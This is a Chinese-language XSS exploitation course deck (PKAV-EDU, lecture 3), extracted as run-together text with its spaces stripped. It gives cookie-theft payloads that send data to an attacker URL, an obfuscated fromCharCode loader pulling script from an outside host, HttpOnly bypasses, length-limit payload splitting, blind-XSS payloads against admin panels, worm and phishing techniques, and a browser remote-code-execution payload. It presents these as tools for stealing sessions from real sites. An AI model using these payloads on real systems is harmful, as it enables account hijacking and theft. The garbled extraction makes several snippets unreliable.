XSS利用與挖掘課件

PKAV-EDU《XSS漏洞利用》第3講BYGAINOVERXSS利用與挖掘XSS利用流程2XSS利用與挖掘用戶種類–普通用戶含有XSS攻擊代碼的頁面Cookies數(shù)據(jù)使用cookies數(shù)據(jù)登錄XSS利用與挖掘Helloxss!alert(1)alert(document.cookie)Xsser.mePython

Perl

Php

Anyotherscripts!!XSS利用與挖掘如何發(fā)送cookies數(shù)據(jù)方式一AJAXXMLHttpRequestIEChrome同域請求ActiveXObject("Microsoft.XMLHTTP")ActiveXObject("MSXML2.XMLHTTP")XMLHttpRequest跨域請求XDomainRequestXMLHttpRequestXSS利用與挖掘AJAX數(shù)據(jù)發(fā)送流程vara=window.XMLHttpRequest();a.open("GET","URL?數(shù)據(jù)",true);a.send(null);open("POST","URL",true);send(數(shù)據(jù));r.php跨域Access-Control-Allow-OriginAccess-Control-Allow-MethodsAccess-Control-Allow-Headers跨域請求可以發(fā)送數(shù)據(jù)但不能接受數(shù)據(jù)數(shù)據(jù)庫郵箱XSS利用與挖掘如何發(fā)送cookies數(shù)據(jù)方式二<formid="x"action="POST地址"> <inputtype="hidden"value="數(shù)據(jù)"name="c"/></form><script> //提交表單 document.getElementById("x").submit();</script>XSS利用與挖掘如何發(fā)送cookies數(shù)據(jù)方式三varx=newImage();x.src="URL?數(shù)據(jù)";XSS利用與挖掘如何調(diào)用外部JS文件除了獲取cookies，我們通常還需要做其它邪惡的事情～～獲取用戶資料獲取當前頁面內(nèi)容傳播消息–導致蠕蟲JS小段代碼調(diào)用XSS插入我們需要執(zhí)行的一系列操作XSS利用與挖掘調(diào)用外部JS文件的方法<scriptsrc="JS地址"></script>靜態(tài)創(chuàng)建動態(tài)創(chuàng)建<script>vars=document.createElement("script");s.src="JS地址";(document.body||document.documentElement).appendChild(s);</script>jsBodyXSS利用與挖掘調(diào)用外部JS文件的方法變形圖片方式調(diào)用外部JS<imgstyle=display:nonesrc=1onerror='vars=document.createElement("script");s.src="";(document.body||document.documentElement).appendChild(s);'/>alert(1)

調(diào)用外部JSeval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115,34,59,40,100,111,99,117,109,101,110,116,46,98,111,100,121,124,124,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59));Flash方式調(diào)用外部JS<embedsrc=""allowscriptaccess="always">XSS利用與挖掘調(diào)用外部JS文件–借刀殺人$.getScript主公救我！jQuery君企鵝君XSS利用與挖掘如何查找網(wǎng)頁中可以用于調(diào)用外部JS的函數(shù)newQZFL.jsLoader().load("http://")小福利，見附件中：invoke.listfunctions.txtXSS利用與挖掘一個DOMXSS的完整利用代碼編寫過程alert(1);//%3E&singertype=othe"eval(String.fromCharCode(118,97,))"%20/%3E&singertype=othealert(1)

調(diào)用外部JSalert(1)iframe到攻擊頁面中<iframe/src='"><imgstyle=display:nonesrc=1onerror="eval(String.fromCharCode(118,97,...))"/>&singertype=othe'style="display:none"></iframe>14XSS利用與挖掘拿到Cookies數(shù)據(jù)后怎么使用？實例演示XSS利用與挖掘批量利用Cookies數(shù)據(jù)qq.plgainover./qq.txtnoproxy一大波Cookies!腳本一大波請求找代理分發(fā)給WEBSHELL16XSS利用與挖掘XSS利用過程中會遇到的問題XSS利用與挖掘什么是http-only？什么是Http-only!boolsetcookie(stringname[,stringvalue[,intexpire[,stringpath[,stringdomain[,boolsecure[,boolhttponly]]]]]])PHP5.2.0intsetcookie(stringname,stringvalue,intexpire,stringpath,stringdomain,intsecure);PHP<5.2.0WhenTRUEthecookiewillbemadeaccessibleonlythroughtheHTTPprotocol.Thismeansthatthecookiewon'tbeaccessiblebyscriptinglanguages,suchasJavaScript.只能用于傳輸，而不能被腳本獲取XSS利用與挖掘如何查看Cookies是否有http-only？對比抓包得到的Cookies數(shù)據(jù)與document.cookie!document.cookie.split(";").join("\n")抓包工具抓取的cookiesXSS利用與挖掘如何查看Cookies是否有http-only？壯哉我大Chrome調(diào)試工具！！XSS利用與挖掘突破http-only的方法方式一、HTTPTrace(CROSS-SITE TRACING,XST)IE6時代的http-only繞過技術古為今用！插件：Siverlight–Flash-Java21XSS利用與挖掘突破http-only的方法方式二、探針文件（phpinfo.php）(function(){varx=newXMLHttpRequest();x.open("GET","./9.phpinfo.php",false);x.send(null);varc=x.responseText||"";c=c.match(/<td[^<>]+?>_SERVER\["HTTP_COOKIE"\]<\/td><td[^<>]+?>([\w\W]+?)<\/td>/)||["",""];console.log(c[1]);})()22XSS利用與挖掘突破http-only的方法方式三、WEB服務器漏洞–Apache<2.2.22(CVE-2012-0053)23XSS利用與挖掘突破Http-only的實際應用新浪微博COOKIES盜取淘寶網(wǎng)COOKIES盜取騰訊某論壇XSS攻擊，獲取httponlyPKAV10.apache.400XSS利用與挖掘攻擊利用長度限制關鍵時候！

長度不夠怎么辦？專治各種不孕不育？小藥丸？尼瑪！我說的是利用代碼太長，輸入點長度不夠！25XSS利用與挖掘三個臭皮匠，頂個諸葛亮！<imgtitle="圖片描述"></img><imgtitle="圖片描述"></img><imgtitle="圖片描述"></img>……15個選項20個字符<imgtitle=""onload="alert(1)"></img>17個字符<imgtitle=""><script>/*"></img><imgtitle="*/alert(1)/*"></img><imgtitle="*/</script>"></img><imgtitle=""><script>/*"></img><imgtitle="*/alert(1)/*"></img><imgtitle="*/</script>"></img>XSS利用與挖掘借尸還魂！<imgalt="圖片名稱"></img>"onload="alert(1)30個字符"onload="9個字符JS代碼

21個字符真裝不下了！！27XSS利用與挖掘借尸還魂！<imgsrc=""title=""r="a($('s').r+$('r').r)"id="t"></img>

<imgsrc=""title=""r="QZFL.imports('//xsst"id="s"></img>

<imgsrc=""title=""r=".)"id="r"></img>

<imgsrc=""title=""onload="a=eval;a($('t').r)"></img>模型一模型二<imgsrc=""title="eval(g_userPro)"id="t"></img>

<imgsrc=""title=""onload="eval($('t').title)"></img>27個字符30個字符g_userProQZFL.imports('//)28XSS利用與挖掘借尸還魂！*哪些尸體可以借？';eval(qUserInfo.spaceName)//<--可控的JS變量

';eval(M.innerHTML)//<--21個長度

';eval(M.title)//<--17個長度

';eva)//<--16個長度

';eval(M.alt)//<--15個長度

';eval(M.src)//<--15個長度<標簽id=Mtitle=xxxxxxxxname=xxxxxxxalt=xxxxxxxxxsrc=xxxxxxxx>xxxxxxxx</標簽>29XSS利用與挖掘注意https與http！注意在https頁面中調(diào)用http的JS文件，會被瀏覽器攔截這一問題！支持https的，比如GAE（*.,各種被墻中….）測試代碼見：11.https-http.txtXSS利用與挖掘用戶種類–管理員信息入侵控制XSS利用與挖掘BlindXSS(盲打)如何接觸管理員？信息收集水坑攻擊目標網(wǎng)站交互點傳統(tǒng)XSSBlindXSS有QQ的不一定是人，還有可能是禽獸！難度大！XSS利用與挖掘BlindXSS成因金玉其外,敗絮其中!開發(fā)：只有管理人員使用，何必做的那么完美？頁面簡陋！毫無過濾XSS利用與挖掘BlindXSS成因姓名：建議：前臺(攻擊者可見)后臺(管理員可見)姓名建議gainover軟件標題字太小<imgsrc=1onerror=alert(1)>gainover軟件標題字太小攻擊者最初是看不見后臺是什么樣子的！！故而叫盲打！方法：不管3721，見到框框就輸入代碼！34XSS利用與挖掘BlindXSS代碼編寫姓名:<span>[輸出點]</span>姓名:<inputtype="text"value="[輸出點]"> <inputtype="text"value='[輸出點]'>3.建議:<textarea>[輸出點]</textarea>4.建議:<script>vardata=[{sug:"[輸出點]"}];</script>雖然看不見，但是可以想象！<imgstyle=display:noneonerror=with(document.body)appendChild(document.createElement('script')).src=altalt=src=xx:x>"></textarea></script>'(12.bind.xss.exp.txt)XSS利用與挖掘BlindXSS危害-橫掃各大廠商！用xss平臺淪陷百度投訴中心后臺手機feedbackxss盲打金山詞霸UED中心(2集連播)雪球網(wǎng)xss盲打后臺功能較多的后臺各種其它漏洞！某公交集團盲打到獲取shellXSS利用與挖掘BlindXSS經(jīng)常出現(xiàn)的場景意見建議WooYun-2012-09547WooYun-2012-14869注冊資料WooYun-2013-18049手機客戶端WooYun-2012-12308WooYun-2012-11978文章發(fā)布WooYun-2013-22125注冊資料WooYun-2013-18049中獎短信XSS利用與挖掘BlindXSS會遇到的問題及解決辦法1.Session過期問題！解決辦法：KeepSession程序，即利用一個小程序，獲取我們所獲得的Cookies數(shù)據(jù)，每隔一段時間訪問目標網(wǎng)站頁面，防止Session失效！2.Cookies有http-only、后臺在內(nèi)網(wǎng)被隔離、訪問IP受限等。解決辦法：嘗試使用XSS獲取后臺頁面數(shù)據(jù)，返回本地后進行分析是否存在可以利用的鏈接，未發(fā)現(xiàn)，繼續(xù)獲取子頁面內(nèi)容進行分析。操作繁瑣，需要重復使用XSS盲打！猥瑣小技巧：后臺打不到，可以直接插一個QQ的XSS過去！XSS利用與挖掘蹲管理，收人頭！管理員QQ名單被我們修改的首頁鏈接！沒事別進草，小心XSS！XSS利用與挖掘蹲管理，收Shell!視頻Demo:WordPress3.5xssgetshell開源程序后臺存在getshell權限后臺存在XSS漏洞(直接)或網(wǎng)站其它存在XSS漏洞(間接)下載：實例演示Demo

Code

@13.wordpress.getshell.htmXSS利用與挖掘攻擊方式之定向攻擊XSS點對點，XSS直接發(fā)揮作用，獲取用戶信息41XSS利用與挖掘攻擊方式之定向攻擊微博私信IM客戶端郵箱騰訊微博私信存儲型XSS百度某IM通訊產(chǎn)品存儲型XSS騰訊WEBQQ聊天功能XSS-附帶消息蠕蟲代碼

新浪微博私信處存儲型XSSQQ空間禮物功能XSS可以攻擊任意指定QQ號碼用戶騰訊QQ聊天框XSS當|XSS蠕蟲|與|QQ系統(tǒng)消息推送|雙劍合璧之后…

QQ郵箱XSS，郵件中可調(diào)用外部javascript文件QQ郵箱XSS，音樂功能導致郵件加載任意javascriptWooYun:Gmail某處XSS可導致賬號持久劫持

XSS利用與挖掘攻擊方式之誘騙攻擊XSS點對點，XSS不能直接發(fā)揮作用clickjackingphishing誘騙的目的：1.讓不能自動觸發(fā)的JS被點擊觸發(fā) 2.獲取更為直接的密碼信息XSS利用與挖掘XSS+clickjacking(點擊劫持)Demo:下一頁點我有驚喜哦！44XSS利用與挖掘XSS+Phishing(釣魚攻擊)直接在當前頁面動態(tài)模擬創(chuàng)建登錄窗口2.通過location.href='javascript:\'HTML內(nèi)容\''的方式重寫當前頁面內(nèi)容，瀏覽器URL保持不變，或者通過設置為假的URL。history.pushState({},"xxx","/cgi-bin/loginpage")XSS利用與挖掘攻擊方式之水坑攻擊46XSS利用與挖掘如何定義水坑攻擊！基本信息收集經(jīng)常上哪些網(wǎng)站？網(wǎng)站1網(wǎng)站2…..挑出容易被攻陷的網(wǎng)站拿下網(wǎng)站，種下XSS代碼直接拿下控制權網(wǎng)站存在存儲型XSS烽火戲諸侯,只為博伊人一笑訪問網(wǎng)站Cookies數(shù)據(jù)XSS利用與挖掘水坑攻擊實例！從得知李老師會上36kr36kr文章頁面使用了denglu.cc的評論插件存儲型XSSQQ某DOMXSS蹲！！XSS利用與挖掘攻擊方式之XSS后門有一種存儲型XSS叫self–xss！翻譯成中文：自X！XSS某商城個人資料1提交這個頁面只有自己能看到！只能自己X自己。。。XSS利用與挖掘攻擊方式之XSS后門XSS某商城個人資料黑客構造頁面提交修改資料的請求內(nèi)含XSS代碼受害者點開頁面XSSRookit!CSRF反射型XSSXSS利用與挖掘攻擊方式之XSS后門實例！受害者Iframe調(diào)用(function(){functionj(w){window.s=document.createElement('script');window.s.src='//(window.s)}j('jq');j('wq')})()Flashxsshttp://*/getvfqq.php?cookie={Cookie數(shù)據(jù)}獲取vfwebqq參數(shù)設置主題調(diào)用外部JS獲取cookies劫持WEBQQ持久劫持XSS利用與挖掘攻擊方式之XSS后門實例！的某FlashXss。獲取token保存一個頁面鏈接含XSS代碼XSS后門！百度首頁Xss后門-可對用戶進行持久劫持XSS利用與挖掘攻擊方式之XSS后門經(jīng)常出現(xiàn)的場景1.商城及類似網(wǎng)站的個人信息頁面2.博客，郵箱等程序的設置/配置頁面?zhèn)鹘y(tǒng)的存儲型XSS存儲在本地的信息所導致的XSScookies/storage/localdatabase第三方插件，例如FLASH的本地存儲（

sharedobjcet）--淘寶某處存儲型XSS漏洞(WooYun-2013-22080)--當當網(wǎng)：二級域反射XSS變身所有域下存儲XSS(WooYun-2013-17527)XSS利用與挖掘XSS蠕蟲攻擊者受害者系統(tǒng)消息推送點開系統(tǒng)消息自定義頁面FLASHXSS偷取COOKIES獲取好友列表推送系統(tǒng)消息受害者好友群XSS利用與挖掘XSS蠕蟲形成的條件中了XSS以后！獲取關系列表發(fā)布信息受害者受害者受害者受害者循環(huán)！不能有驗證碼??！獲取發(fā)布信息所需的參數(shù)發(fā)布信息XSSXSSXSSXSS利用與挖掘利用XSS進行虛假消息傳播！受害者攻擊者被XSS后！二級受害者虛假消息！信任56XSS利用與挖掘XSS與瀏覽器！"><iframename="fuck"src=""onload=alert(fuck.window.eval("Install('ExtWebMail','013','360郵件通','','')"))></iframe>360安全瀏覽器遠程代碼執(zhí)行漏洞360一主程序存在嚴重漏洞varinfo="apptype=1;appdisplaytype=1;appid=/../../../../../windows/;appname=登錄管家;appver=056;iconurl=";external.twExtSendMessage2(external.twGetSecurityID(window),"pluginbar","InstallAppItem","",info);360安全瀏覽器遠程代碼執(zhí)行漏洞XSS利用與挖掘XSS與瀏覽器瀏覽器會在特定的域下提供一些高權限操作360允許在下執(zhí)行高權限操作QQ會允許域名下的代碼調(diào)用soso工具欄的COM組件瀏覽器中部分UI也是由網(wǎng)頁完成的，這些頁面存在XSS導致高權限操作！瀏